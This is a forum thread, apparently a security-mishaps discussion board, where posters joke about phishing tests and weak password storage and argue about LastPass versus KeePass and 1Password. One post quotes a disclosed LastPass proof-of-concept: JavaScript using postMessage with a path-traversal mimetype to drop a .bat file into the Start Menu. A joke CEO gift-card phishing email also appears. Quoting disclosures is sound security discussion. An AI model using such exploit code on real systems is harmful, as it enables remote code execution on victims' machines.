  • Post
post hole digger
Mar 21, 2011

My PIN is 4826 posted:

the phishing simulation for this quarter was a ransom email, which was interesting yes the idiots used an actual working bitcoin address and yes it had a balance so somebody paid the ransom

hahahahahahaha

cinci zoo sniper
Mar 15, 2013

haveblue
Aug 15, 2005

Toilet Rascal
figure out who did it with a blockchain explorer, shame them on slack

pseudorandom name
May 6, 2007

lol if you didn't use an unique address for every employee

Captain Foo
May 11, 2004

we vibin'
we slidin'
we breathin'
we dyin'

Doom Mathematic
Sep 2, 2008

My PIN is 4826 posted:

the phishing simulation for this quarter was a ransom email, which was interesting yes the idiots used an actual working bitcoin address and yes it had a balance so somebody paid the ransom

For-profit phishing, I like it.

My PIN is 4826
Aug 30, 2003

pseudorandom name posted:

lol if you didn't use an unique address for every employee

sadly not, but the simulations are done for us by a third party so this will be a gift that keeps on giving as their template gets re-used elsewhere

ThePeavstenator
Dec 18, 2012

:burger::burger::burger::burger::burger:

Establish the Buns

:burger::burger::burger::burger::burger:
Today I found two stored procedures called "encrypt" and "decrypt" in an old applications database. Turns out the "encryption" algorithm for passwords was ROT128 (ASCII is the alphabet) and then reversing the string.

Yes this application was 99% stored procs why do you ask

ThePeavstenator fucked around with this message at 00:29 on Mar 8, 2019

evil_bunnY
Apr 2, 2003

ZeusCannon posted:

We legit dont have calc anymore on our end points and im pretty sure its because someone was like they cant confirm calc.exe if they dont have it :pseudo:
LMAO

My PIN is 4826 posted:

the phishing simulation for this quarter was a ransom email, which was interesting yes the idiots used an actual working bitcoin address and yes it had a balance so somebody paid the ransom
alright now you lyin’

evil_bunnY fucked around with this message at 00:33 on Mar 8, 2019

ewiley
Jul 9, 2003

More trash for the trash fire

My PIN is 4826 posted:

the phishing simulation for this quarter was a ransom email, which was interesting yes the idiots used an actual working bitcoin address and yes it had a balance so somebody paid the ransom

this is a pretty amazing idea and I'm stealing it right now.

From: CEO <really.the.CEO@yahoo.com>
Subject: Important

I need you to buy some gift cards for a client ASAP.

Raere
Dec 13, 2007

ThePeavstenator posted:

Today I found two stored procedures called "encrypt" and "decrypt" in an old applications database. Turns out the "encryption" algorithm for passwords was ROT128 (ASCII is the alphabet) and then reversing the string.

Yes this application was 99% stored procs why do you ask

Not as secure as ROT26

jeffery
Jan 1, 2013
the unusability of daily life is really annoying

BattleMaster
Aug 14, 2000

If an employee pays up for a test ransom, do you get to keep it?

haveblue
Aug 15, 2005

Toilet Rascal
everyone is better off with fewer bitcoins so yes

Feisty-Cadaver
Jun 1, 2000
The worms crawl in,
The worms crawl out.

univbee posted:

i'm very seriously considering getting lastpass

I have to use lastpass for work. it is unbelievable terrible garbage. maybe it's just the ~~enterprise~~ version, but holy gently caress.

things "fail" to save even though they did actually save, so you end up with duplicate entries

never, ever use attachments. wanna download from the website? Not possible unless you install their (hilariously insecure in the past) browser extension. But if you have a Mac, you can download their app on the App Store!

my login process to this app:
login. App crashes. Login again. Attempt to download an attachment. App hard-locks. Login again. Whoops this file name is longer than 32 characters, we can't save that! Please rename. This happens 100% of the time.

There's not an app for windows. install the browser extension.

URL grey tea
Jun 1, 2004

IT'S A SAD THING THAT YOUR ADVENTURES HAVE ENDED HERE!!
we have to turn off the lastpass browser extension whenever we don't need it or the laptop fans immediately spin up and stay that way for hours. good product.

tk
Dec 10, 2003

Nap Ghost

ThePeavstenator posted:

Today I found two stored procedures called "encrypt" and "decrypt" in an old applications database. Turns out the "encryption" algorithm for passwords was ROT128 (ASCII is the alphabet) and then reversing the string.

Yes this application was 99% stored procs why do you ask

Back in a previous life we were using HP Quality Center and had just enabled LDAP authentication. I decided to check the DB passwords and there was a bunch of suspicious looking 24-43-31... poo poo in the password field. Sure enough, they were just adjusting each character by a fixed offset in the corresponding top-secret string SmolkaWasHereMonSher

ErIog
Jul 11, 2001

:nsacloud:
I have a secfuck question where I'm looking in the mirror and wondering if the secfuck is me.

I'm getting some poo poo from an auditor about libxml2. They had brought it up previously, and I was able to respond to it with "lol, noob, learn how the gently caress package versions work on RHEL, none of these CVE's apply."

It has been brought up again, but this time I'm not so sure I can reply with that same response because there's actually a bunch of low/medium CVE's listed for libxml2 in the RHEL CVE database with the status "Won't Fix" or "May be fixed in the future :iiam:" even for RHEL7.

What are Wizard Security Professionals doing for this case? libxml2 seems like a package that would be installed quite a lot.

ErIog fucked around with this message at 02:46 on Mar 8, 2019

Achmed Jones
Oct 16, 2004

compensating controls

Wiggly Wayne DDS
Sep 11, 2010

please no more trolling the thread about using/recommending lastpass

univbee
Jun 3, 2004

well that sucks, although so far at least my test run seems to be behaving. i'm not spending all day changing and creating passwords, really all i want is the equivalent of an excel spreadsheet of passwords which needs its own password and 2fa to get into

Janitor Prime
Jan 22, 2004

PC LOAD LETTER

What da fuck does that mean

Fun Shoe

univbee posted:

well that sucks, although so far at least my test run seems to be behaving. i'm not spending all day changing and creating passwords, really all i want is the equivalent of an excel spreadsheet of passwords which needs its own password and 2fa to get into

just use keepAss and throw it on a Dropbox

Cocoa Crispies
Jul 20, 2001

Vehicular Manslaughter!

Pillbug

BattleMaster posted:

If an employee pays up for a test ransom, do you get to keep it?

carl mark force iv finds new career as phishing tester

Shaggar
Apr 26, 2006

univbee posted:

well that sucks, although so far at least my test run seems to be behaving. i'm not spending all day changing and creating passwords, really all i want is the equivalent of an excel spreadsheet of passwords which needs its own password and 2fa to get into

I betchu could do totp in vba. altho access might be more appropriate than excel

univbee
Jun 3, 2004

Janitor Prime posted:

just use keepAss and throw it on a Dropbox

i'm also setting this up for family members

i'm going to be committing to a decision at some point this weekend and lastpass is currently looking the most needs-suiting

Wiggly Wayne DDS
Sep 11, 2010

i've been yelling against using it since release. they've been hacked multiple times, glossed over what was impacted then, and designed the vault to allow online-only access with bypasses for the master key, 2fa or region locks

please just go with 1password or keepass

Shame Boy
Mar 2, 2010

"spreadsheet for passwords with a lock" is pretty much exactly keep rear end, you can't do 2FA but you can set it up to require a key file that you store on a USB stick or SD card or w/e if you want so just having the password isn't enough. It's not the same amount of security as 2FA (if they have full access to your machine they can probably just wait for you to plug the thing in and copy it) but it's better than just a password :shrug:

geonetix
Mar 6, 2011

ErIog posted:

I have a secfuck question where I'm looking in the mirror and wondering if the secfuck is me.

I'm getting some poo poo from an auditor about libxml2. They had brought it up previously, and I was able to respond to it with "lol, noob, learn how the gently caress package versions work on RHEL, none of these CVE's apply."

It has been brought up again, but this time I'm not so sure I can reply with that same response because there's actually a bunch of low/medium CVE's listed for libxml2 in the RHEL CVE database with the status "Won't Fix" or "May be fixed in the future :iiam:" even for RHEL7.

What are Wizard Security Professionals doing for this case? libxml2 seems like a package that would be installed quite a lot.

libxml2 works fine with cves in it as long as it’s not used to process input or generate output. so eh yeah patch it

Shame Boy
Mar 2, 2010

i think all computers are safe so long as they're not used to process input or generate output tbh

DrPossum
May 15, 2004

i am not a surgeon
yeah, i keepass

univbee
Jun 3, 2004

Wiggly Wayne DDS posted:

i've been yelling against using it since release. they've been hacked multiple times, glossed over what was impacted then, and designed the vault to allow online-only access with bypasses for the master key, 2fa or region locks

please just go with 1password or keepass

i'll be evaluating all of this definitely. do you have any links discussing these points, and anything more recent than the 2016 hack?

Shame Boy posted:

i think all computers are safe so long as they're not used to process input or generate output tbh

this sounds like a good solution

Salt Fish
Sep 11, 2003

Cybernetic Crumb
Which libxml cve are you worried about specifically? Asking about them generically is like asking a doctor who never met you if you should be taking prescriptions.

Wiggly Wayne DDS
Sep 11, 2010

univbee posted:

i'll be evaluating all of this definitely. do you have any links discussing these points, and anything more recent than the 2016 hack?

Wiggly Wayne DDS posted:

i've yelled and yelled about lastpass before. here's a post from 2015 after they have multiple breaches, which they said wasn't really a problem as they couldn't read your passwords due to the master password, also 2fa and other restrictions made the rest of the attackers data useless. what their pr forgot to mention was a vulnerability had been notified to them in that time period that showed a design decision allowing a bypass to requiring the master password:

Wiggly Wayne DDS posted:

If your password manager, by default, has an unencrypted key stored (dOTP) that can be used to authenticate, obtain the encrypted vault key, decrypt the vault key, bypass IP restrictions, bypass 2FA and relies on local storage being impenetrable then you've got a bit of a design flaw. We've seen the damage in the past when Lastpass had an XSS problem that let an attacker grab any plaintext passwords from a vault silently. You're not storing your vault on a single system by virtue of using Lastpass so that is not the only possible angle of attack, and based on prior issues I can't comfortably advise people to use it for secure password storage. Especially given their response to the issues presented.
it was just 2017 when taviso had a glance at it and found a rce:

Wiggly Wayne DDS posted:

lastpass vuln is up: https://bugs.chromium.org/p/project-zero/issues/detail?id=1209#c5

quote:

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

quote:

LastPass responded and said they have NXDOMAIN'd 1min-ui-prod.service.lastpass.com while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

quote:

I've uploaded the exploit here:

https://lock.cmpxchg8b.com/SaiGhij5/lastpass.html
these are all well after they had burned any ounce of security credibility but people kept on giving them another chance, so there's little point in me yelling about it more - either you care about security or you use lastpass
https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=lastpass
i may have had this argument a few times before, and followup arguments pointing at my prior arguments

FlapYoJacks
Feb 12, 2009

ErIog posted:

I have a secfuck question where I'm looking in the mirror and wondering if the secfuck is me.

I'm getting some poo poo from an auditor about libxml2. They had brought it up previously, and I was able to respond to it with "lol, noob, learn how the gently caress package versions work on RHEL, none of these CVE's apply."

It has been brought up again, but this time I'm not so sure I can reply with that same response because there's actually a bunch of low/medium CVE's listed for libxml2 in the RHEL CVE database with the status "Won't Fix" or "May be fixed in the future :iiam:" even for RHEL7.

What are Wizard Security Professionals doing for this case? libxml2 seems like a package that would be installed quite a lot.

Grab the source RPM and rebuild it with a newer libxml2.

LordSaturn
Aug 12, 2007

sadly unfunny

univbee posted:

i'm also setting this up for family members

keep rear end is good poo poo but not something I want to train my parents to use. slightly too many buttons/nerd features to work well for the technically disinclined. 1password is straightforward to use, and not a big sloppy mess of RCEs

univbee
Jun 3, 2004

yeah i may have to just suck it up and use 1password, i'll continue testing

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender
this is a lastpast-free zone

evil_bunnY
Apr 2, 2003

univbee posted:

i'll be evaluating all of this definitely. do you have any links discussing these points, and anything more recent than the 2016 hack?
you’re not in a position to be evaluating poo poo, FYI. please do what the actual knowledge havers have been telling you to or stop complaining.

CommieGIR
Aug 22, 2006

The blue glow is a feature, not a bug

Pillbug
Keepass and Mooltipass are still acceptable, right?:ohdear:

  • 1
  • 2
  • 3
  • 4